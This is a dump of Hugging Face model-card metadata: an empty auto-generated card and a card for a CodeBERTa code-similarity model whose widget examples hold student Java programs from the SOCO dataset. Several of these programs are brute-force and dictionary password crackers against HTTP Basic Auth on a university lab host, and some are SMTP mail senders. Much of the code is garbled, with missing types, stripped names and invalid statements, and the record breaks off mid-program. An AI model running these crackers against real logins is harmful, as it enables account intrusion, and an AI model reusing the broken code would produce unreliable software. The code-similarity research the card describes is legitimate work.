modelId (string, length 5 to 139) | author (string, length 2 to 42) | last_modified (timestamp[us, tz=UTC], 2020-02-15 11:33:14 to 2025-09-24 06:28:30) | downloads (int64, 0 to 223M) | likes (int64, 0 to 11.7k) | library_name (string, 573 classes) | tags (list, length 1 to 4.05k) | pipeline_tag (string, 55 classes) | createdAt (timestamp[us, tz=UTC], 2022-03-02 23:29:04 to 2025-09-24 06:27:16) | card (string, length 11 to 1.01M)
---|---|---|---|---|---|---|---|---|---
bedio/MobileLLM-R1-140M-base_stack_48 | bedio | 2025-09-23T16:02:41Z | 0 | 0 | transformers | ["transformers", "safetensors", "llama4_text", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "endpoints_compatible", "region:us"] | text-generation | 2025-09-23T16:02:30Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs16-lr2e-05-split0.1
|
buelfhood
| 2025-09-23T15:58:51Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:38664",
"loss:CachedMultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:58:40Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:38664
- loss:CachedMultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class sendMail\
\ {\n\npublic void sendMail(String mailServer, String recipient, String result)\
\ {\n try {\n Socket s = new Socket(mailServer, 25);\n BufferedReader\
\ in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO client\");\n\n send(in, out, \"MAIL FROM: <WatchDog@SecureECommerce.>\"\
);\n send(in, out, \"RCPT : \" + recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \");\n send(out, \"From: Admin <WatchDog@SecureECommerce.>\"\
);\n send (out, \"\\n\");\n \n send(out, result);\n send(out,\
\ \"\\n.\\n\");\n send(in, out, \"QUIT\");\n\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String\
\ strFilepath;\n private String strCurrWord;\n private File fWordFile;\n\
\ private BufferedReader in;\n \n \n public PasswordFile(String filepath)\
\ {\n strFilepath = filepath;\n try {\n fWordFile = new\
\ File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n\
\ }\n catch(Exception e)\n {\n System.out.println(\"\
Could not open file \" + strFilepath);\n }\n }\n \n String getPassword()\
\ {\n return strCurrWord;\n }\n \n String getNextPassword() {\n\
\ try {\n strCurrWord = in.readLine();\n \n \
\ \n \n }\n catch (Exception e)\n {\n \
\ \n return null;\n }\n \n return\
\ strCurrWord;\n }\n \n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class SendEMail {\n\n public\
\ void SendEMail(){}\n\npublic void sendMail(String recipient,String c, String\
\ subject){\n try {\n\n Socket s = new Socket(\"yallara.cs.rmit.edu.\"\
, 25);\n BufferedReader in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO theWorld\");\n \n \n send(in, out, \"MAIL FROM: <watch@dog.>\"\
);\n send(in, out, \"RCPT : \"+recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \"+ subject);\n send(out, \"From: WatchDog.java\"\
);\n send (out, \"\\n\");\n \n BufferedReader reader;\n String\
\ line;\n reader = new BufferedReader(new InputStreamReader(new FileInputStream()));\n\
\ line = reader.readLine();\n while (line != null){\n send(out,\
\ line);\n line = reader.readLine();\n }\n send(out, \"\\n.\\\
n\");\n send(in, out, \"QUIT\");\n s.print();\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
- source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\
import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\
\ URL url;\n private HttpURLConnection connection ;\n private int stopTime\
\ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\
\ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \
\ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\
\ }\n\n public static void main (String args[])\n {\n BruteForce bf\
\ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass BruteForce {\n\n String password=\"\";\n\n int num =401;\n\n\n \
\ public static void main (String[] args) {\n\n String str=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd=\"\
\";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n\
\ \tSystem.err.println (\n \t\t\n \t\t\"Usage : java BruteForce\
\ <username>\");\n \treturn;\n \t\n \t}\n String username\
\ = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println\
\ (\" \" + new Date());\n \n System.out.println (\"Using BruteForce\
\ method attack \"+username+\"'s password.Please waiting.......\");\n\n \
\ for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "\n\n\n\npublic class HoldSharedData\n{\n private int numOfConnections\
\ = 0;\n private int startTime;\n private int totalTime = 0;\n \
\ private String[] password;\n private int pwdCount;\n\n public HoldSharedData(\
\ int time, String[] pwd, int count )\n {\n startTime = time;\n\n \
\ password = pwd;\n pwdCount = count;\n }\n\n public int getPwdCount()\n\
\ {\n return pwdCount;\n }\n\n public void setNumOfConnections(\
\ )\n {\n numOfConnections ++;\n }\n\n public int getNumOfConnections()\n\
\ {\n return numOfConnections;\n }\n\n public int getStartTime()\n\
\ {\n return startTime;\n }\n\n public void setTotalTime( int\
\ newTotalTime )\n {\n totalTime = newTotalTime;\n }\n\n public\
\ int getTotalTime()\n {\n return totalTime;\n }\n\n public String\
\ getPasswordAt( int index )\n {\n return password[index];\n }\n\
} \n"
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class Dictionary\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public Dictionary()\n \
\ {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n\
\ findWords();\n }\n\n public static void main(String args[])\n {\n\
\ Dictionary sc = new Dictionary();\n }\n \n \n public void findWords()\n\
\ {\n try\n {\n BufferedReader input = new BufferedReader(new\
\ FileReader (\"words\"));\n String text;\n while ((text = input.readLine())\
\ != null)\n {\n if ((text.length() == 3) || (text.length()\
\ == 2))\n {\n count++;\n decision(text);\n\
\ }\n\n }\n\n }\n catch (IOException io)\n \
\ {\n System.out.println(\"File Error: \" + io.getMessage());\n }\n\
\ }\n \n \n public void decision(String s1)\n {\n if (find(s1)\
\ == 200)\n {\n stopTime = System.currentTimeMillis();\n \
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\n\
import java.util.*;\n\npublic class MyClient1 implements Runnable\n{\n private\
\ String hostname;\n private int port;\n private String filename;\n private\
\ Socket s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private Dictionary myMaster;\n \n\n public MyClient1(Dictionary\
\ dic, int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(bf.hasMoreTokens())\n\
\ {\n tokens[i] =bf .nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.recieve();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\nimport java.Runtime.*;\n\
import java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
\n\npublic class ReadFile\n{\n private StringTokenizer tokenizer;\n private\
\ BufferedReader bf;\n private String line;\n private String first;\n Vector\
\ in = new Vector();\n \n public void loadFile()throws NoSuchElementException,\
\ IOException\n {\n System.out.println(\"in loadFile\");\n try{\n bf\
\ = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException\
\ fe){}\n catch(IOException io){}\n while((line = bf.readLine())!=null)\n\
\ {\n\n int index = 0;\n tokenizer = new StringTokenizer(line);\n\
\ try\n\t {\n\t first = tokenizer.nextToken();\n\t \n\t \n\
\t if (first.length() == 3)\n\t {\n\t\tin.add(first);\n\t }\n\t }\n\
\ catch(NoSuchElementException n)\n\t {\n System.out.println(\"\
File Loaded Succesfully\");\n\n }\n\n }\n }\n public Vector getVector()\n\
\ {\n return in;\n }\n public static void main (String args[])\n {\n\
\ Vector v = new Vector();\n try\n {\n System.out.println(\"\
in \");\n\t ReadFile rf = new ReadFile();\n rf.loadFile();\n v =\
\ rf.getVector();\n\t \n }\n catch(IOException e)\n {\n System.out.println(e);\n\
\ }\n System.out.println(\"size:\" + v.size());\n for (int i = 0;\
\ i< v.size(); i++)\n {\n System.out.println(i+1+ \":\" + v.elementAt(i));\n\
\ }\n \n \n }\n \n}\n"
- "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\nimport\
\ java.util.*;\n\npublic class MyClient2 implements Runnable\n{\n private String\
\ hostname;\n private int port;\n private String filename;\n private Socket\
\ s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private BruteForce myMaster;\n \n\n public MyClient2(BruteForce\
\ bf , int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
